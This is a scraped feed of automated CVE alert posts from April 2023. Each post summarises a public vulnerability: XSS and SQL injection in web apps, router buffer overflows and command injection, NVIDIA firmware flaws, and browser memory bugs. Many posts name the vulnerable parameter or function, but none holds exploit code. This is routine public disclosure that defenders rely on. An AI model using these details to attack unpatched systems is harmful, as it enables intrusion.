🚨 CVE-2023-30627jellyfin-web is the web client for Jellyfin, a free-software media system. Starting in version 10.1.0 and prior to version 10.8.10, a stored cross-site scripting vulnerability in device.js can be used to make arbitrary calls to the `REST` endpoints with admin privileges. When combined with CVE-2023-30626, this results in remote code execution on the Jellyfin instance in the context of the user who's running it. This issue is patched in version 10.8.10. There are no known workarounds.🎖@cveNotify |
|
| 2023-04-24 22:58:13 |
🚨 CVE-2023-22670A heap-based buffer overflow exists in the DXF file reading procedure in Open Design Alliance Drawings SDK before 2023.6. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of the length of user-supplied XRecord data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.🎖@cveNotify |
|
| 2023-04-24 22:58:12 |
🚨 CVE-2023-2107A vulnerability, which was classified as critical, was found in IBOS 4.5.5. Affected is an unknown function of the file file/personal/del&op=recycle. The manipulation of the argument fids leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226110 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-24 21:58:30 |
🚨 CVE-2023-1126The WP FEvents Book WordPress plugin through 0.46 does not sanitise and escape some parameters, which could allow any authenticated users, such as subscriber to perform Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-04-24 21:58:29 |
🚨 CVE-2023-1324The Easy Forms for Mailchimp WordPress plugin before 6.8.8 does not sanitise and escape some parameters before outputting them back in the response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-04-24 21:58:28 |
🚨 CVE-2023-1420The Ajax Search Lite WordPress plugin before 4.11.1, Ajax Search Pro WordPress plugin before 4.26.2 does not sanitise and escape a parameter before outputting it back in a response of an AJAX action, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-04-24 21:58:24 |
🚨 CVE-2023-1623The Custom Post Type UI WordPress plugin before 1.13.5 does not properly check for CSRF when sending the debug information to a user supplied email, which could allow attackers to make a logged in admin send such information to an arbitrary email address via a CSRF attack.🎖@cveNotify |
|
| 2023-04-24 21:58:23 |
🚨 CVE-2023-1624The WPCode WordPress plugin before 2.0.9 has a flawed CSRF when deleting log, and does not ensure that the file to be deleted is inside the expected folder. This could allow attackers to make users with the wpcode_activate_snippets capability delete arbitrary log files on the server, including outside of the blog folders🎖@cveNotify |
|
| 2023-04-24 21:58:19 |
🚨 CVE-2023-29780Third Reality Smart Blind 1.00.54 contains a denial-of-service vulnerability, which allows a remote attacker to send malicious Zigbee messages to a vulnerable device and cause crashes.🎖@cveNotify |
|
| 2023-04-24 21:58:18 |
🚨 CVE-2023-0420The Custom Post Type and Taxonomy GUI Manager WordPress plugin through 1.1 does not have CSRF, and is lacking sanitising as well as escaping in some parameters, allowing attackers to make a logged in admin put Stored Cross-Site Scripting payloads via CSRF🎖@cveNotify |
|
| 2023-04-24 21:58:17 |
🚨 CVE-2023-2104Improper Access Control in GitHub repository alextselegidis/easyappointments prior to 1.5.0.🎖@cveNotify |
|
| 2023-04-24 21:58:13 |
🚨 CVE-2023-2101A vulnerability, which was classified as problematic, has been found in moxi624 Mogu Blog v2 up to 5.2. This issue affects the function uploadPictureByUrl of the file /mogu-picture/file/uploadPicsByUrl. The manipulation of the argument urlList leads to absolute path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226109 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-24 21:58:12 |
🚨 CVE-2021-46880x509/x509_verify.c in LibreSSL before 3.4.2, and OpenBSD before 7.0 errata 006, allows authentication bypass because an error for an unverified certificate chain is sometimes discarded.🎖@cveNotify |
|
| 2023-04-24 19:58:29 |
🚨 CVE-2023-2073A vulnerability was found in Campcodes Online Traffic Offense Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /classes/Login.php. The manipulation of the argument password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226051.🎖@cveNotify |
|
| 2023-04-24 19:58:25 |
🚨 CVE-2023-2090A vulnerability classified as critical has been found in SourceCodester Employee and Visitor Gate Pass Logging System 1.0. Affected is an unknown function of the file /admin/maintenance/view_designation.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226098 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-24 19:58:24 |
🚨 CVE-2023-2091A vulnerability classified as critical was found in KylinSoft youker-assistant. Affected by this vulnerability is the function adjust_cpufreq_scaling_governer. The manipulation leads to os command injection. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. Upgrading to version 3.1.4.13 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-226099.🎖@cveNotify |
|
| 2023-04-24 19:58:23 |
🚨 CVE-2023-25409Aten PE8108 2.4.232 is vulnerable to Incorrect Access Control. Restricted users have access to other users outlets.🎖@cveNotify |
|
| 2023-04-24 19:58:19 |
🚨 CVE-2023-30637Baidu braft 1.1.2 has a memory leak related to use of the new operator in example/atomic/atomic_server. NOTE: installations with brpc-0.14.0 and later are unaffected.🎖@cveNotify |
|
| 2023-04-24 19:58:18 |
🚨 CVE-2023-24822RIOT-OS, an operating system that supports Internet of Things devices, contains a network stack with the ability to process 6LoWPAN frames. Prior to version 2022.10, an attacker can send a crafted frame to the device resulting in a NULL pointer dereference while encoding a 6LoWPAN IPHC header. The NULL pointer dereference causes a hard fault exception, leading to denial of service. Version 2022.10 fixes this issue. As a workaround, apply the patches manually.🎖@cveNotify |
|
| 2023-04-24 19:58:17 |
🚨 CVE-2023-24821RIOT-OS, an operating system that supports Internet of Things devices, contains a network stack with the ability to process 6LoWPAN frames. Prior to version 2022.10, an attacker can send a crafted frame to the device resulting in a large out of bounds write beyond the packet buffer. The write will create a hard fault exception after reaching the last page of RAM. The hard fault is not handled and the system will be stuck until reset, thus the impact is denial of service. Version 2022.10 fixes this issue. As a workaround, disable support for fragmented IP datagrams or apply the patches manually.🎖@cveNotify |
|
| 2023-04-24 19:58:16 |
🚨 CVE-2023-30622Clusternet is a general-purpose system for controlling Kubernetes clusters across different environments. An issue in clusternet prior to version 0.15.2 can be leveraged to lead to a cluster-level privilege escalation. The clusternet has a deployment called `cluster-hub` inside the `clusternet-system` Kubernetes namespace, which runs on worker nodes randomly. The deployment has a service account called `clusternet-hub`, which has a cluster role called `clusternet:hub` via cluster role binding. The `clusternet:hub` cluster role has `"*" verbs of "*.*"` resources. Thus, if a malicious user can access the worker node which runs the clusternet, they can leverage the service account to do malicious actions to critical system resources. For example, the malicious user can leverage the service account to get ALL secrets in the entire cluster, resulting in cluster-level privilege escalation. Version 0.15.2 contains a fix for this issue.🎖@cveNotify |
|
| 2023-04-24 16:58:33 |
🚨 CVE-2023-24818RIOT-OS, an operating system that supports Internet of Things devices, contains a network stack with the ability to process 6LoWPAN frames. Prior to version 2022.10, an attacker can send a crafted frame to the device resulting in a NULL pointer dereference. During forwarding of a fragment an uninitialized entry in the reassembly buffer is used. The NULL pointer dereference triggers a hard fault exception resulting in denial of service. Version 2022.10 fixes this issue. As a workaround, disable support for fragmented IP datagrams or apply the patches manually.🎖@cveNotify |
|
| 2023-04-24 16:58:32 |
🚨 CVE-2023-24820RIOT-OS, an operating system that supports Internet of Things devices, contains a network stack with the ability to process 6LoWPAN frames. An attacker can send a crafted frame to the device resulting in a large out of bounds write beyond the packet buffer. The write will create a hard fault exception after reaching the last page of RAM. The hard fault is not handled and the system will be stuck until reset. Thus the impact is denial of service. Version 2022.10 fixes this issue. As a workaround, apply the patch manually.🎖@cveNotify |
|
| 2023-04-24 16:58:31 |
🚨 CVE-2023-29479Ribose RNP before 0.16.3 may hang when the input is malformed.🎖@cveNotify |
|
| 2023-04-24 16:58:30 |
🚨 CVE-2023-29848Bang Resto 1.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the itemName parameter in the admin/menu.php Add New Menu function.🎖@cveNotify |
|
| 2023-04-24 16:58:26 |
🚨 CVE-2023-2251Uncaught Exception in GitHub repository eemeli/yaml prior to 2.2.2.🎖@cveNotify |
|
| 2023-04-24 16:58:25 |
🚨 CVE-2023-30370In Tenda AC15 V15.03.05.19, the function GetValue contains a stack-based buffer overflow vulnerability.🎖@cveNotify |
|
| 2023-04-24 16:58:24 |
🚨 CVE-2023-30372In Tenda AC15 V15.03.05.19, The function "xkjs_ver32" contains a stack-based buffer overflow vulnerability.🎖@cveNotify |
|
| 2023-04-24 16:58:20 |
🚨 CVE-2023-30373In Tenda AC15 V15.03.05.19, the function "xian_pppoe_user" contains a stack-based buffer overflow vulnerability.🎖@cveNotify |
|
| 2023-04-24 16:58:19 |
🚨 CVE-2023-30376In Tenda AC15 V15.03.05.19, the function "henan_pppoe_user" contains a stack-based buffer overflow vulnerability.🎖@cveNotify |
|
| 2023-04-24 16:58:18 |
🚨 CVE-2023-30368Tenda AC5 V15.03.06.28 is vulnerable to Buffer Overflow via the initWebs function.🎖@cveNotify |
|
| 2023-04-24 16:58:14 |
🚨 CVE-2022-48476In JetBrains Ktor before 2.3.0 path traversal in the `resolveResource` method was possible🎖@cveNotify |
|
| 2023-04-24 16:58:13 |
🚨 CVE-2023-29578mp4v2 v2.0.0 was discovered to contain a heap buffer overflow via the mp4v2::impl::MP4StringProperty::~MP4StringProperty() function at src/mp4property.cpp.🎖@cveNotify |
|
| 2023-04-24 16:58:12 |
🚨 CVE-2023-29582yasm 1.3.0.55.g101bc was discovered to contain a stack overflow via the function parse_expr1 at /nasm/nasm-parse.c.🎖@cveNotify |
|
| 2023-04-24 14:58:25 |
🚨 CVE-2023-0190NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where a NULL pointer dereference may lead to denial of service.🎖@cveNotify |
|
| 2023-04-24 14:58:21 |
🚨 CVE-2023-0199NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer handler, where an out-of-bounds write can lead to denial of service and data tampering.🎖@cveNotify |
|
| 2023-04-24 14:58:20 |
🚨 CVE-2023-0200NVIDIA DGX-2 contains a vulnerability in OFBD where a user with high privileges and a pre-conditioned heap can cause an access beyond a buffers end, which may lead to code execution, escalation of privileges, denial of service, and information disclosure.🎖@cveNotify |
|
| 2023-04-24 14:58:19 |
🚨 CVE-2023-0202NVIDIA DGX A100 SBIOS contains a vulnerability where an attacker may modify arbitrary memory of SMRAM by exploiting the GenericSio and LegacySmmSredir SMM APIs. A successful exploit of this vulnerability may lead to denial of service, escalation of privileges, and information disclosure.🎖@cveNotify |
|
| 2023-04-24 14:58:18 |
🚨 CVE-2023-0203NVIDIA ConnectX-5, ConnectX-6, and ConnectX6-DX contain a vulnerability in the NIC firmware, where an unprivileged user can exploit insufficient granularity of access control, which may lead to denial of service.🎖@cveNotify |
|
| 2023-04-24 14:58:14 |
🚨 CVE-2023-0205NVIDIA ConnectX-5, ConnectX-6, and ConnectX6-DX contain a vulnerability in the NIC firmware, where an unprivileged user can exploit insufficient granularity of access control, which may lead to denial of service.🎖@cveNotify |
|
| 2023-04-24 14:58:13 |
🚨 CVE-2023-0207NVIDIA DGX-2 SBIOS contains a vulnerability where an attacker may modify the ServerSetup NVRAM variable at runtime by executing privileged code. A successful exploit of this vulnerability may lead to denial of service.🎖@cveNotify |
|
| 2023-04-24 14:58:12 |
🚨 CVE-2023-0209NVIDIA DGX-1 SBIOS contains a vulnerability in the Uncore PEI module, where authentication of the code executed by SSA is missing, which may lead to arbitrary code execution, denial of service, escalation of privileges assisted by a firmware implant, information disclosure assisted by a firmware implant, data tampering, and SecureBoot bypass.🎖@cveNotify |
|
| 2023-04-24 12:58:16 |
🚨 CVE-2023-25133Improper privilege management vulnerability in default.cmd file in PowerPanel Business Local/Remote for Windows v4.8.6 and earlier, PowerPanel Business Management for Windows v4.8.6 and earlier, PowerPanel Business Local/Remote for Linux 32bit v4.8.6 and earlier, PowerPanel Business Local/Remote for Linux 64bit v4.8.6 and earlier, PowerPanel Business Management for Linux 32bit v4.8.6 and earlier, PowerPanel Business Management for Linux 64bit v4.8.6 and earlier, PowerPanel Business Local/Remote for MacOS v4.8.6 and earlier, and PowerPanel Business Management for MacOS v4.8.6 and earlier allows remote attackers to execute operation system commands via unspecified vectors.🎖@cveNotify |
|
| 2023-04-24 12:58:15 |
🚨 CVE-2020-15858Some devices of Thales DIS (formerly Gemalto, formerly Cinterion) allow Directory Traversal by physically proximate attackers. The directory path access check of the internal flash file system can be circumvented. This flash file system can store application-specific data and data needed for customer Java applications, TLS and OTAP (Java over-the-air-provisioning) functionality. The affected products and releases are: BGS5 up to and including SW RN 02.000 / ARN 01.001.06 EHSx and PDSx up to and including SW RN 04.003 / ARN 01.000.04 ELS61 up to and including SW RN 02.002 / ARN 01.000.04 ELS81 up to and including SW RN 05.002 / ARN 01.000.04 PLS62 up to and including SW RN 02.000 / ARN 01.000.04🎖@cveNotify |
|
| 2023-04-24 12:58:14 |
🚨 CVE-2023-25131Use of default password vulnerability in PowerPanel Business Local/Remote for Windows v4.8.6 and earlier, PowerPanel Business Management for Windows v4.8.6 and earlier, PowerPanel Business Local/Remote for Linux 32bit v4.8.6 and earlier, PowerPanel Business Local/Remote for Linux 64bit v4.8.6 and earlier, PowerPanel Business Management for Linux 32bit v4.8.6 and earlier, PowerPanel Business Management for Linux 64bit v4.8.6 and earlier, PowerPanel Business Local/Remote for MacOS v4.8.6 and earlier, and PowerPanel Business Management for MacOS v4.8.6 and earlier allows remote attackers to log in to the server directly to perform administrative functions. Upon installation or upon first login, the application does not ask the user to change the 'admin' password.🎖@cveNotify |
|
| 2023-04-24 12:58:13 |
🚨 CVE-2023-25132Unrestricted upload of file with dangerous type vulnerability in default.cmd file in PowerPanel Business Local/Remote for Windows v4.8.6 and earlier, PowerPanel Business Management for Windows v4.8.6 and earlier, PowerPanel Business Local/Remote for Linux 32bit v4.8.6 and earlier, PowerPanel Business Local/Remote for Linux 64bit v4.8.6 and earlier, PowerPanel Business Management for Linux 32bit v4.8.6 and earlier, PowerPanel Business Management for Linux 64bit v4.8.6 and earlier, PowerPanel Business Local/Remote for MacOS v4.8.6 and earlier, and PowerPanel Business Management for MacOS v4.8.6 and earlier allows remote attackers to execute operation system commands via unspecified vectors.🎖@cveNotify |
|
| 2023-04-24 10:58:33 |
🚨 CVE-2023-22577Within White Rabbit Switch it's possible as an unauthenticated user to retrieve sensitive information such as password hashes and the SNMP community strings.🎖@cveNotify |
|
| 2023-04-24 10:58:32 |
🚨 CVE-2023-22581White Rabbit Switch contains a vulnerability which makes it possible for an attacker to perform system commands under the context of the web application (the default installation makes the webserver run as the root user).🎖@cveNotify |
|
| 2023-04-24 10:58:31 |
🚨 CVE-2021-3652A flaw was found in 389-ds-base. If an asterisk is imported as password hashes, either accidentally or maliciously, then instead of being inactive, any password will successfully match during authentication. This flaw allows an attacker to successfully authenticate as a user whose password was disabled.🎖@cveNotify |
|
| 2023-04-24 10:58:30 |
🚨 CVE-2022-0918A vulnerability was discovered in the 389 Directory Server that allows an unauthenticated attacker with network access to the LDAP port to cause a denial of service. The denial of service is triggered by a single message sent over a TCP connection, no bind or other authentication is required. The message triggers a segmentation fault that results in slapd crashing.🎖@cveNotify |
|
| 2023-04-24 10:58:26 |
🚨 CVE-2021-4091A double-free was found in the way 389-ds-base handles virtual attributes context in persistent searches. An attacker could send a series of search requests, forcing the server to behave unexpectedly, and crash.🎖@cveNotify |
|
| 2023-04-24 10:58:25 |
🚨 CVE-2019-3883In 389-ds-base up to version 1.4.1.2, requests are handled by workers threads. Each sockets will be waited by the worker for at most 'ioblocktimeout' seconds. However this timeout applies only for un-encrypted requests. Connections using SSL/TLS are not taking this timeout into account during reads, and may hang longer.An unauthenticated attacker could repeatedly create hanging LDAP requests to hang all the workers, resulting in a Denial of Service.🎖@cveNotify |
|
| 2023-04-24 10:58:24 |
🚨 CVE-2019-14824A flaw was found in the 'deref' plugin of 389-ds-base where it could use the 'search' permission to display attribute values. In some configurations, this could allow an authenticated attacker to view private attributes, such as password hashes.🎖@cveNotify |
|
| 2023-04-24 10:58:21 |
🚨 CVE-2019-10224A flaw has been found in 389-ds-base versions 1.4.x.x before 1.4.1.3. When executed in verbose mode, the dscreate and dsconf commands may display sensitive information, such as the Directory Manager password. An attacker, able to see the screen or record the terminal standard error output, could use this flaw to gain sensitive information.🎖@cveNotify |
|
| 2023-04-24 10:58:20 |
🚨 CVE-2023-30533SheetJS Community Edition before 0.19.3 allows Prototype Pollution via a crafted file.🎖@cveNotify |
|
| 2023-04-24 10:58:19 |
🚨 CVE-2023-31083An issue was discovered in drivers/bluetooth/hci_ldisc.c in the Linux kernel 6.2. In hci_uart_tty_ioctl, there is a race condition between HCIUARTSETPROTO and HCIUARTGETPROTO. HCI_UART_PROTO_SET is set before hu->proto is set. A NULL pointer dereference may occur.🎖@cveNotify |
|
| 2023-04-24 10:58:15 |
🚨 CVE-2023-31081An issue was discovered in drivers/media/test-drivers/vidtv/vidtv_bridge.c in the Linux kernel 6.2. There is a NULL pointer dereference in vidtv_mux_stop_thread. In vidtv_stop_streaming, after dvb->mux=NULL occurs, it executes vidtv_mux_stop_thread(dvb->mux).🎖@cveNotify |
|
| 2023-04-24 10:58:14 |
🚨 CVE-2023-31085An issue was discovered in drivers/mtd/ubi/cdev.c in the Linux kernel 6.2. There is a divide-by-zero error in do_div(sz,mtd->erasesize), used indirectly by ctrl_cdev_ioctl, when mtd->erasesize is 0.🎖@cveNotify |
|
| 2023-04-24 10:58:13 |
🚨 CVE-2023-28131A vulnerability in the expo.io framework allows an attacker to take over accounts and steal credentials on an application/website that configured the "Expo AuthSession Redirect Proxy" for social sign-in. This can be achieved once a victim clicks a malicious link. The link itself may be sent to the victim in various ways (including email, text message, an attacker-controlled website, etc).🎖@cveNotify |
|
| 2023-04-24 05:58:15 |
🚨 CVE-2023-31059Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.🎖@cveNotify |
|
| 2023-04-24 05:58:14 |
🚨 CVE-2023-31061Repetier Server through 1.4.10 does not have CSRF protection.🎖@cveNotify |
|
| 2023-04-23 23:58:12 |
🚨 CVE-2023-31043EnterpriseDB EDB Postgres Advanced Server (EPAS) before 14.6.0 logs unredacted passwords in situations where optional parameters are used with CREATE/ALTER USER/GROUP/ROLE, and redacting was configured with edb_filter_log.redact_password_commands. The fixed versions are 10.23.33, 11.18.29, 12.13.17, 13.9.13, and 14.6.0.🎖@cveNotify |
|
| 2023-04-23 18:58:12 |
🚨 CVE-2023-2246A vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0 and classified as critical. This vulnerability affects unknown code of the file admin/ajax.php?action=save_settings. The manipulation of the argument img leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227236.🎖@cveNotify |
|
| 2023-04-23 14:58:17 |
🚨 CVE-2023-2133Out of bounds memory access in Service Worker API in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-23 14:58:13 |
🚨 CVE-2023-2135Use after free in DevTools in Google Chrome prior to 112.0.5615.137 allowed a remote attacker who convinced a user to enable specific preconditions to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-23 14:58:12 |
🚨 CVE-2023-2137Heap buffer overflow in sqlite in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-23 14:58:11 |
🚨 CVE-2023-28427matrix-js-sdk is a Matrix messaging protocol Client-Server SDK for JavaScript. In versions prior to 24.0.0 events sent with special strings in key places can temporarily disrupt or impede the matrix-js-sdk from functioning properly, potentially impacting the consumer's ability to process data safely. Note that the matrix-js-sdk can appear to be operating normally but be excluding or corrupting runtime data presented to the consumer. This vulnerability is distinct from GHSA-rfv9-x7hh-xc32 which covers a similar issue. The issue has been patched in matrix-js-sdk 24.0.0 and users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-23 05:58:14 |
🚨 CVE-2023-1668A flaw was found in openvswitch (OVS). When processing an IP packet with protocol 0, OVS will install the datapath flow without the action modifying the IP header. This issue results (for both kernel and userspace datapath) in installing a datapath flow matching all IP protocols (nw_proto is wildcarded) for this flow, but with an incorrect action, possibly causing incorrect handling of other IP packets with a != 0 IP protocol that matches this dp flow.🎖@cveNotify |
|
| 2023-04-23 05:58:13 |
🚨 CVE-2023-23009Libreswan 4.9 allows remote attackers to cause a denial of service (assert failure and daemon restart) via crafted TS payload with an incorrect selector length.🎖@cveNotify |
|
| 2023-04-22 20:58:13 |
🚨 CVE-2022-4944A vulnerability, which was classified as problematic, has been found in kalcaddle KodExplorer up to 4.49. Affected by this issue is some unknown functionality. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.50 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-227000.🎖@cveNotify |
|
| 2023-04-22 20:58:12 |
🚨 CVE-2023-1875Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.🎖@cveNotify |
|
| 2023-04-22 05:58:35 |
🚨 CVE-2023-0199NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer handler, where an out-of-bounds write can lead to denial of service and data tampering.🎖@cveNotify |
|
| 2023-04-22 05:58:34 |
🚨 CVE-2023-0200NVIDIA DGX-2 contains a vulnerability in OFBD where a user with high privileges and a pre-conditioned heap can cause an access beyond a buffers end, which may lead to code execution, escalation of privileges, denial of service, and information disclosure.🎖@cveNotify |
|
| 2023-04-22 05:58:33 |
🚨 CVE-2023-0201NVIDIA DGX-2 SBIOS contains a vulnerability in Bds, where a user with high privileges can cause a write beyond the bounds of an indexable resource, which may lead to code execution, denial of service, compromised integrity, and information disclosure.🎖@cveNotify |
|
| 2023-04-22 05:58:32 |
🚨 CVE-2023-0202NVIDIA DGX A100 SBIOS contains a vulnerability where an attacker may modify arbitrary memory of SMRAM by exploiting the GenericSio and LegacySmmSredir SMM APIs. A successful exploit of this vulnerability may lead to denial of service, escalation of privileges, and information disclosure.🎖@cveNotify |
|
| 2023-04-22 05:58:28 |
🚨 CVE-2023-0204NVIDIA ConnectX-5, ConnectX-6, and ConnectX6-DX contain a vulnerability in the NIC firmware, where an unprivileged user can cause improper handling of exceptional conditions, which may lead to denial of service.🎖@cveNotify |
|
| 2023-04-22 05:58:27 |
🚨 CVE-2023-0205NVIDIA ConnectX-5, ConnectX-6, and ConnectX6-DX contain a vulnerability in the NIC firmware, where an unprivileged user can exploit insufficient granularity of access control, which may lead to denial of service.🎖@cveNotify |
|
| 2023-04-22 05:58:26 |
🚨 CVE-2023-0207NVIDIA DGX-2 SBIOS contains a vulnerability where an attacker may modify the ServerSetup NVRAM variable at runtime by executing privileged code. A successful exploit of this vulnerability may lead to denial of service.🎖@cveNotify |
|
| 2023-04-22 05:58:22 |
🚨 CVE-2023-25505NVIDIA DGX-1 BMC contains a vulnerability in the IPMI handler of the AMI MegaRAC BMC , where an attacker with the appropriate level of authorization can cause a buffer overflow, which may lead to denial of service, information disclosure, or arbitrary code execution.🎖@cveNotify |
|
| 2023-04-22 05:58:21 |
🚨 CVE-2023-2004An integer overflow vulnerability was discovered in Freetype in tt_hvadvance_adjust() function in src/truetype/ttgxvar.c.🎖@cveNotify |
|
| 2023-04-22 05:58:20 |
🚨 CVE-2023-1994GQUIC dissector crash in Wireshark 4.0.0 to 4.0.4 and 3.6.0 to 3.6.12 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-04-22 05:58:19 |
🚨 CVE-2023-1992RPCoRDMA dissector crash in Wireshark 4.0.0 to 4.0.4 and 3.6.0 to 3.6.12 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-04-22 05:58:15 |
🚨 CVE-2023-28205A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2023-04-22 05:58:14 |
🚨 CVE-2022-48434libavcodec/pthread_frame.c in FFmpeg before 5.1.2, as used in VLC and other products, leaves stale hwaccel state in worker threads, which allows attackers to trigger a use-after-free and execute arbitrary code in some circumstances (e.g., hardware re-initialization upon a mid-video SPS change when Direct3D11 is used).🎖@cveNotify |
|
| 2023-04-22 05:58:13 |
🚨 CVE-2023-25358A use-after-free vulnerability in WebCore::RenderLayer::addChild in WebKitGTK before 2.36.8 allows attackers to execute code remotely.🎖@cveNotify |
|
| 2023-04-22 01:58:32 |
🚨 CVE-2023-2118Insufficient access control in support ticket feature in Devolutions Server 2023.1.5.0 and below allows an authenticated attacker to send support tickets and download diagnostic files via specific endpoints.🎖@cveNotify |
|
| 2023-04-21 22:58:44 |
🚨 CVE-2022-47505The SolarWinds Platform was susceptible to the Local Privilege Escalation Vulnerability. This vulnerability allows a local adversary with a valid system user account to escalate local privileges.🎖@cveNotify |
|
| 2023-04-21 22:58:43 |
🚨 CVE-2022-47509The SolarWinds Platform was susceptible to the Incorrect Input Neutralization Vulnerability. This vulnerability allows a remote adversary with a valid SolarWinds Platform account to append URL parameters to inject HTML.🎖@cveNotify |
|
| 2023-04-21 22:58:39 |
🚨 CVE-2023-30618Kitchen-Terraform provides a set of Test Kitchen plugins which enable the use of Test Kitchen to converge a Terraform configuration and verify the resulting infrastructure systems with InSpec controls. Kitchen-Terraform v7.0.0 introduced a regression which caused all Terraform output values, including sensitive values, to be printed at the `info` logging level during the `kitchen converge` action. Prior to v7.0.0, the output values were printed at the `debug` level to avoid writing sensitive values to the terminal by default. An attacker would need access to the local machine in order to gain access to these logs during an operation. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-21 22:58:38 |
🚨 CVE-2023-26846A stored cross-site scripting (XSS) vulnerability in OpenCATS v0.9.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the city parameter at opencats/index.php?m=candidates.🎖@cveNotify |
|
| 2023-04-21 22:58:37 |
🚨 CVE-2023-26847A stored cross-site scripting (XSS) vulnerability in OpenCATS v0.9.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the state parameter at opencats/index.php?m=candidates.🎖@cveNotify |
|
| 2023-04-21 22:58:33 |
🚨 CVE-2023-1534Out of bounds read in ANGLE in Google Chrome prior to 111.0.5563.110 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-21 22:58:32 |
🚨 CVE-2023-27890** UNSUPPORTED WHEN ASSIGNED ** The Export User plugin through 2.0 for MyBB allows XSS during the process of an admin generating DSGVO data for a user, via the Custom User Title, Location, or Bio field. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-04-21 22:58:31 |
🚨 CVE-2023-26918Diasoft File Replication Pro 7.5.0 allows attackers to escalate privileges by replacing a legitimate file with a Trojan horse that will be executed as LocalSystem. This occurs because %ProgramFiles%\FileReplicationPro allows Everyone:(F) access.🎖@cveNotify |
|
| 2023-04-21 20:58:34 |
🚨 CVE-2023-29847AeroCMS v0.0.1 was discovered to contain multiple stored cross-site scripting (XSS) vulnerabilities via the comment_author and comment_content parameters at /post.php. These vulnerabilities allow attackers to execute arbitrary web scripts or HTML via a crafted payload.🎖@cveNotify |
|
| 2023-04-21 20:58:33 |
🚨 CVE-2023-2075A vulnerability classified as critical has been found in Campcodes Online Traffic Offense Management System 1.0. This affects an unknown part of the file /admin/offenses/view_details.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226053 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-21 20:58:32 |
🚨 CVE-2023-2076A vulnerability classified as problematic was found in Campcodes Online Traffic Offense Management System 1.0. This vulnerability affects unknown code of the file /classes/Users.phpp. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-226054 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-21 20:58:28 |
🚨 CVE-2023-29798TOTOLINK X18 V9.1.0cu.2024_B20220329 was discovered to contain a command injection vulnerability via the command parameter in the setTracerouteCfg function.🎖@cveNotify |
|
| 2023-04-21 20:58:27 |
🚨 CVE-2023-29800TOTOLINK X18 V9.1.0cu.2024_B20220329 was discovered to contain a command injection vulnerability via the FileName parameter in the UploadFirmwareFile function.🎖@cveNotify |
|
| 2023-04-21 20:58:26 |
🚨 CVE-2023-29801TOTOLINK X18 V9.1.0cu.2024_B20220329 was discovered to contain multiple command injection vulnerabilities via the rtLogEnabled and rtLogServer parameters in the setSyslogCfg function.🎖@cveNotify |
|
| 2023-04-21 20:58:23 |
🚨 CVE-2022-48468protobuf-c before 1.4.1 has an unsigned integer overflow in parse_required_member.🎖@cveNotify |
|
| 2023-04-21 20:58:22 |
